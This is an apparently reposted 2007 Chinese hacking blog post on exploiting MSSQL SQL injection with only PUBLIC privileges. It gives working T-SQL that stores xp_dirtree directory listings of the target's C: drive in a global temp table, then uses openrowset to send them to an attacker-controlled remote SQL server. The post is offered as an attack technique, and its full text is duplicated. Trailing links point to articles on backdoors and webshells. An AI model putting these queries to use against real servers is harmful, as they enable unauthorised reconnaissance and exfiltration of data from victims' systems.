MSSQL注入PUBLIC權(quán)限下的xp_dirtree再度利用方法
更新時(shí)間:2007年10月08日 22:50:16 作者:
軟件作者:kj021320
信息來源:I.S.T.O技術(shù)團(tuán)隊(duì)(http://blog.csdn.net/I_S_T_O/)
本來這文章在TEAM里面放了好久的了!只是<<art of sql injection>>的一個(gè)小部分,可惜寫了好久資料收集了好多但是估計(jì)年底都沒能出來~那就先發(fā)出來了!主要是MSSQL2005都來了!2K的話沒多久就會(huì)給淘汰了~拿出來跟大家交流吧~廣告說完了...
正文:
提起public權(quán)限的用戶估計(jì)很多人也覺得郁悶了吧~N久以前看了一篇《論在mssql中public和db_owner權(quán)限下拿到webshell或是系統(tǒng)權(quán)限》的文章(名字真長-_-!!!),里面說到?jīng)]辦法利用xp_regread,xp_dirtree…這些存儲(chǔ)過程,原因是public沒有辦法建表,我在這里矯正一下其實(shí)public是可以建表的~呵呵,使這些存儲(chǔ)過程能利用上,看下面的代碼吧
--建立一個(gè)臨時(shí)表,一般的表我們是無辦法建立的,我們只能建立臨時(shí)表
create table ##nonamed(
dir ntext,
num int
)
--調(diào)用存儲(chǔ)過程把執(zhí)行回來的數(shù)據(jù)存到臨時(shí)表里面
insert ##nonamed execute master..xp_dirtree 'c:\',1
--然后采用openrowset函數(shù)把臨時(shí)表的數(shù)據(jù)導(dǎo)到本地MSSQL 的dirtree表里面了
insert into openrowset('sqloledb', '192.0.0.1';'user';'pass', 'select * from Northwind.dbo.dirtree')
select * from ##nonamed
以上方法,也就是說public可以遍歷用戶服務(wù)器的目錄 具體有什么利用價(jià)值嘛~呵呵見仁見智了
Trackback: http://tb.blog.csdn.net/TrackBack.aspx?PostId=1736964
信息來源:I.S.T.O技術(shù)團(tuán)隊(duì)(http://blog.csdn.net/I_S_T_O/)
本來這文章在TEAM里面放了好久的了!只是<<art of sql injection>>的一個(gè)小部分,可惜寫了好久資料收集了好多但是估計(jì)年底都沒能出來~那就先發(fā)出來了!主要是MSSQL2005都來了!2K的話沒多久就會(huì)給淘汰了~拿出來跟大家交流吧~廣告說完了...
正文:
提起public權(quán)限的用戶估計(jì)很多人也覺得郁悶了吧~N久以前看了一篇《論在mssql中public和db_owner權(quán)限下拿到webshell或是系統(tǒng)權(quán)限》的文章(名字真長-_-!!!),里面說到?jīng)]辦法利用xp_regread,xp_dirtree…這些存儲(chǔ)過程,原因是public沒有辦法建表,我在這里矯正一下其實(shí)public是可以建表的~呵呵,使這些存儲(chǔ)過程能利用上,看下面的代碼吧
--建立一個(gè)臨時(shí)表,一般的表我們是無辦法建立的,我們只能建立臨時(shí)表
create table ##nonamed(
dir ntext,
num int
)
--調(diào)用存儲(chǔ)過程把執(zhí)行回來的數(shù)據(jù)存到臨時(shí)表里面
insert ##nonamed execute master..xp_dirtree 'c:\',1
--然后采用openrowset函數(shù)把臨時(shí)表的數(shù)據(jù)導(dǎo)到本地MSSQL 的dirtree表里面了
insert into openrowset('sqloledb', '192.0.0.1';'user';'pass', 'select * from Northwind.dbo.dirtree')
select * from ##nonamed
以上方法,也就是說public可以遍歷用戶服務(wù)器的目錄 具體有什么利用價(jià)值嘛~呵呵見仁見智了
Trackback: http://tb.blog.csdn.net/TrackBack.aspx?PostId=1736964
相關(guān)文章
變態(tài)入侵之有史以來最酷的Windows后門sethc.exe
變態(tài)入侵之有史以來最酷的Windows后門sethc.exe...2007-11-11

非常不錯(cuò)的腳本入侵基礎(chǔ)知識(shí)總結(jié)
簡單的說來,webshell就是一個(gè)asp或php木馬后門,黑客在入侵了一個(gè)網(wǎng)站后,常常在將這些 asp或php木馬后門文件放置在網(wǎng)站服務(wù)器的web目錄中,與正常的網(wǎng)頁文件混在一起。
2008-06-06